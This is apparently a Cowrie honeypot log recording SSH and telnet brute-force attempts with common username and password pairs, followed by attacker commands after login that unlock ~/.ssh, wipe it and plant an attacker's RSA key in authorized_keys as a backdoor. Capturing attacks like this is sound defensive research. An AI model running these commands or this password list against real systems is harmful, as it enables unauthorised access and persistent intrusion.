{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":59568,"dst_ip":"1.2.3.4","dst_port":22,"session":"b84c51256f43","protocol":"ssh","message":"New connection: 134.199.174.250:59568 (1.2.3.4:22) [session: b84c51256f43]","sensor":"my-vps","timestamp":"2025-09-08T13:17:12.959199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:17:12.960129Z","src_ip":"134.199.174.250","session":"b84c51256f43"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:17:13.255801Z","src_ip":"134.199.174.250","session":"b84c51256f43"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1234567890","message":"login attempt [oracle/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:17:14.194732Z","src_ip":"134.199.174.250","session":"b84c51256f43"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:17:15.644592Z","src_ip":"134.199.174.250","session":"b84c51256f43"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:17:34.751254Z","src_ip":"117.72.74.154","session":"857ab607c43c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59714,"dst_ip":"1.2.3.4","dst_port":23,"session":"b5be1d5b5a8c","protocol":"telnet","message":"New connection: 212.227.125.160:59714 (1.2.3.4:23) [session: b5be1d5b5a8c]","sensor":"my-vps","timestamp":"2025-09-08T13:17:40.046272Z"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":48988,"dst_ip":"1.2.3.4","dst_port":22,"session":"7776d3a460a5","protocol":"ssh","message":"New connection: 134.199.174.250:48988 (1.2.3.4:22) [session: 7776d3a460a5]","sensor":"my-vps","timestamp":"2025-09-08T13:17:43.109318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:17:43.110894Z","src_ip":"134.199.174.250","session":"7776d3a460a5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:17:43.400048Z","src_ip":"134.199.174.250","session":"7776d3a460a5"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password1","message":"login attempt [oracle/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:17:44.332335Z","src_ip":"134.199.174.250","session":"7776d3a460a5"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:17:45.623946Z","src_ip":"134.199.174.250","session":"7776d3a460a5"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":44592,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd814c44ec22","protocol":"ssh","message":"New connection: 139.59.14.27:44592 (1.2.3.4:22) [session: fd814c44ec22]","sensor":"my-vps","timestamp":"2025-09-08T13:17:50.048179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:17:50.049313Z","src_ip":"139.59.14.27","session":"fd814c44ec22"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:17:50.391939Z","src_ip":"139.59.14.27","session":"fd814c44ec22"}
{"eventid":"cowrie.login.failed","username":"info","password":"Password123","message":"login attempt [info/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:17:51.809528Z","src_ip":"139.59.14.27","session":"fd814c44ec22"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:17:53.154210Z","src_ip":"139.59.14.27","session":"fd814c44ec22"}
{"eventid":"cowrie.session.closed","duration":30.713326930999756,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:10.759531Z","src_ip":"212.227.125.160","session":"b5be1d5b5a8c"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":52362,"dst_ip":"1.2.3.4","dst_port":22,"session":"36216c8581d0","protocol":"ssh","message":"New connection: 134.199.174.250:52362 (1.2.3.4:22) [session: 36216c8581d0]","sensor":"my-vps","timestamp":"2025-09-08T13:18:12.745231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:18:12.746103Z","src_ip":"134.199.174.250","session":"36216c8581d0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:18:13.101271Z","src_ip":"134.199.174.250","session":"36216c8581d0"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"admin123","message":"login attempt [oracle/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:18:14.510144Z","src_ip":"134.199.174.250","session":"36216c8581d0"}
{"eventid":"cowrie.session.connect","src_ip":"198.12.77.137","src_port":54518,"dst_ip":"1.2.3.4","dst_port":22,"session":"0faec4138c2c","protocol":"ssh","message":"New connection: 198.12.77.137:54518 (1.2.3.4:22) [session: 0faec4138c2c]","sensor":"my-vps","timestamp":"2025-09-08T13:18:15.085663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:18:15.086515Z","src_ip":"198.12.77.137","session":"0faec4138c2c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:18:15.220994Z","src_ip":"198.12.77.137","session":"0faec4138c2c"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin)1","message":"login attempt [root/Admin)1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:18:15.800876Z","src_ip":"198.12.77.137","session":"0faec4138c2c"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:15.842766Z","src_ip":"134.199.174.250","session":"36216c8581d0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:18:16.087330Z","src_ip":"198.12.77.137","session":"0faec4138c2c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:18:16.087983Z","src_ip":"198.12.77.137","session":"0faec4138c2c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:18:16.088776Z","src_ip":"198.12.77.137","session":"0faec4138c2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:16.224601Z","src_ip":"198.12.77.137","session":"0faec4138c2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:18:16.588901Z","src_ip":"198.12.77.137","session":"0faec4138c2c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:18:16.589601Z","src_ip":"198.12.77.137","session":"0faec4138c2c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:18:16.726371Z","src_ip":"198.12.77.137","session":"0faec4138c2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:16.727414Z","src_ip":"198.12.77.137","session":"0faec4138c2c"}
{"eventid":"cowrie.session.connect","src_ip":"198.12.77.137","src_port":54522,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a16cca7ecb4","protocol":"ssh","message":"New connection: 198.12.77.137:54522 (1.2.3.4:22) [session: 2a16cca7ecb4]","sensor":"my-vps","timestamp":"2025-09-08T13:18:16.808189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:18:16.808904Z","src_ip":"198.12.77.137","session":"2a16cca7ecb4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:18:16.929339Z","src_ip":"198.12.77.137","session":"2a16cca7ecb4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:18:17.405095Z","src_ip":"198.12.77.137","session":"2a16cca7ecb4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:18.516123Z","src_ip":"198.12.77.137","session":"2a16cca7ecb4"}
{"eventid":"cowrie.session.connect","src_ip":"198.12.77.137","src_port":54534,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcd8e0519871","protocol":"ssh","message":"New connection: 198.12.77.137:54534 (1.2.3.4:22) [session: fcd8e0519871]","sensor":"my-vps","timestamp":"2025-09-08T13:18:18.622790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:18:18.623533Z","src_ip":"198.12.77.137","session":"fcd8e0519871"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:18:18.731702Z","src_ip":"198.12.77.137","session":"fcd8e0519871"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:18:19.205858Z","src_ip":"198.12.77.137","session":"fcd8e0519871"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:19.315834Z","src_ip":"198.12.77.137","session":"fcd8e0519871"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:19.342353Z","src_ip":"198.12.77.137","session":"0faec4138c2c"}
{"eventid":"cowrie.session.connect","src_ip":"45.115.155.121","src_port":56688,"dst_ip":"1.2.3.4","dst_port":22,"session":"920873a73fa2","protocol":"ssh","message":"New connection: 45.115.155.121:56688 (1.2.3.4:22) [session: 920873a73fa2]","sensor":"my-vps","timestamp":"2025-09-08T13:18:19.790000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:18:19.793523Z","src_ip":"45.115.155.121","session":"920873a73fa2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:18:20.160993Z","src_ip":"45.115.155.121","session":"920873a73fa2"}
{"eventid":"cowrie.login.success","username":"root","password":"09N1RCa1Hs31","message":"login attempt [root/09N1RCa1Hs31] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:18:21.511883Z","src_ip":"45.115.155.121","session":"920873a73fa2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:18:22.274723Z","src_ip":"45.115.155.121","session":"920873a73fa2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:18:22.275386Z","src_ip":"45.115.155.121","session":"920873a73fa2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:18:22.276373Z","src_ip":"45.115.155.121","session":"920873a73fa2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:18:22.608080Z","src_ip":"45.115.155.121","session":"920873a73fa2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:18:23.995634Z","src_ip":"45.115.155.121","session":"920873a73fa2"}
